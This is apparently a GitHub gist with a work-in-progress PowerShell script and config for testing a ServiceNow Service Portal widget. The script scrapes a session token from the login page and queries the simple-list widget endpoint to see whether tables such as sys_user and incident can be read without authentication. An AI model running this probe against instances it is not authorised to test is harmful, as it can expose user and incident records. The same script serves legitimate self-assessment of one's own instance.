Skip to content

Instantly share code, notes, and snippets.

@ChecksumFailed
Created October 17, 2023 20:53
Show Gist options
  • Save ChecksumFailed/10755133b3a7fc65259f84505b4a0882 to your computer and use it in GitHub Desktop.
Save ChecksumFailed/10755133b3a7fc65259f84505b4a0882 to your computer and use it in GitHub Desktop.
SerivceNow Widget Exploit Testing

Powershell script to to test simple lis

{
"instance": "devxxxxx",
"widget": "widget-simple-list",
"tables": [
"sys_user",
"incident",
"kb_knowledge"
]
}
#WWork in progress
$configFile = "config.json"
$config = Get-Content $configFile -raw |ConvertFrom-Jsonvi
function getUserToken() {
param (
[Parameter(Mandatory=$False)] [string]$instance = $config.instance
)
$request = Invoke-WebRequest -Method GET -Uri "https://$($instance).service-now.com/login.do"
$g_ck = $request.content|select-string -pattern "g_ck = '(\w+)'" -AllMatches -CaseSensitive
return $g_ck.matches[0].Groups[1].value;
}
function testTable() {
param (
[Parameter(Mandatory=$False)] [string]$instance = $config.instance,
[Parameter(Mandatory=$False)] [string]$widget = $config.widget,
[Parameter(Mandatory=$False)] [string]$userToken = $userToken,
[string]$tableName
)
$uri = "https://$($instance).service-now.com/api/now/sp/widget/$($widget)?t=$($tableName)"
$headers = @{
"X-UserToken" = $userToken
"Content-Type" = "application/json"
}
invoke-WebRequest -Headers $headers -Uri $uri -Method "Post"
}
$results = @{};
$userToken = getUserToken;
$config.tables | ForEach-Object {
$_
$results[$_] = testTable -tableName $_
}
$results
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment